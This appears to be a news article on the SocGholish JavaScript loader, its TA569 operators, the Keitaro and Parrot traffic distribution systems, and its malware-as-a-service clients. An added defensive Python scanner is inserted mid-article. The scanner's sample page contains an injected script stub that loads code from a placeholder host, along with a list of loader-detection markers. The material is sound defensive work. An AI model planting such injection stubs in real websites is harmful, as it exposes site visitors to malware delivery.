SocGholish Malware Evolves, Using Traffic Distribution Systems to Target Victims
The group behind the SocGholish malware has intensified its use of the Parrot TDS and Keitaro TDS traffic distribution systems to filter visitors and redirect them to malicious destinations. According to Silent Push, the foundation of their operations lies in a Malware-as-a-Service (MaaS) model, in which access to already compromised devices is sold to other cybercriminal groups. SocGholish, also known as FakeUpdates, is a JavaScript loader distributed via compromised websites under the guise of updates for popular browsers or applications such as Adobe Flash Player and Microsoft Teams. The campaign is attributed to TA569, also tracked as Gold Prelude, Mustard Tempest, Purple Vallhund, and UNC1543.
The infection chain begins with the deployment of SocGholish onto compromised systems, after which access is provided to its clients — among them Evil Corp, LockBit, Dridex, and Raspberry Robin. In several recent operations, Raspberry Robin itself has been leveraged as a delivery channel for SocGholish. Silent Push notes that websites may be infected either through direct JavaScript injection or via an intermediary script that subsequently downloads the main malware.
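The two web-side infection paths described above (a directly injected external script, and a short inline "intermediary" script that creates a script element at runtime to pull the real loader) can be checked for with a baseline comparison of a site's own pages. The following is an added example written for this article, not code from Silent Push or from the article; the allowlisted hosts, the sample HTML and every `.test` hostname in it are constructed placeholders, and the marker list is a heuristic chosen here, not an indicator taken from the report.

```python
"""
Added example (not from the Silent Push report or this article): flag
<script> injections on a site's pages by comparing external script hosts
against a known-good baseline and by spotting inline stubs that build a
<script> element dynamically.  All hosts and HTML below are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts this site legitimately loads scripts from.
BASELINE_HOSTS = {"www.example-site.test", "cdn.example-site.test"}

# Heuristic markers of an inline stub that injects a further script at
# runtime; two or more in one inline block is treated as suspicious.
LOADER_MARKERS = ("createElement", "appendChild", "insertBefore", "document.write")


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of src= on <script> tags
        self.inline = []        # bodies of inline <script> blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> content as raw data, so buffer it.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)


def scan_page(html, baseline_hosts=BASELINE_HOSTS):
    """Return a list of (finding_kind, detail) tuples for one HTML page."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname   # None for relative (same-origin) paths
        if host and host.lower() not in baseline_hosts:
            findings.append(("unknown_script_host", host.lower()))
    for body in parser.inline:
        hits = sum(marker in body for marker in LOADER_MARKERS)
        if hits >= 2:
            findings.append(("dynamic_loader_stub", body[:60]))
    return findings


# Constructed sample page: one legitimate script, one injected external
# script from an unknown host, one dynamic loader stub, one benign inline.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example-site.test/app.js"></script>
<script src="//tds.placeholder.test/t.js"></script>
<script>var s=document.createElement('script');s.src='//loader.placeholder.test/u.js';document.head.appendChild(s);</script>
<script>console.log('hello');</script>
</head><body></body></html>"""


if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE):
        print(f"{kind}: {detail}")
```

In practice the baseline would be built from a known-good crawl of the site and the scan run against each page on a schedule; a new external host or a new dynamic-loader stub is then a change to investigate rather than a verdict, since legitimate tag managers also create script elements at runtime.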
Beyond direct downloads from infected sites, third-party TDS platforms such as Parrot and Keitaro play a pivotal role in distribution. These systems redirect traffic to targeted pages after performing deep inspection of the victim’s device and user profile. Keitaro TDS is notorious not only for its role in malvertising, but also for delivering exploit kits, loaders, ransomware, and even influence operations. In 2023, it was revealed that SocGholish, in cooperation with VexTrio, used Keitaro to funnel victims toward VexTrio’s TDS. Because Keitaro also has legitimate use cases, blocking it without risking false positives is challenging. Keitaro has been linked to TA2726, which supplies traffic to both SocGholish and TA2727, profiting from the sale of compromised websites embedded with TDS links.
Traffic flows through an intermediary C2 infrastructure, which dynamically crafts the payload for each victim in real time. The entire process — from script injection to malware execution on a Windows system — is orchestrated by SocGholish’s C2 servers. If the target fails to meet predefined criteria, the download is aborted. Analysis further suggests that former members of the Dridex and Raspberry Robin projects may be involved in these campaigns, explaining the overlaps in infrastructure and operational tactics.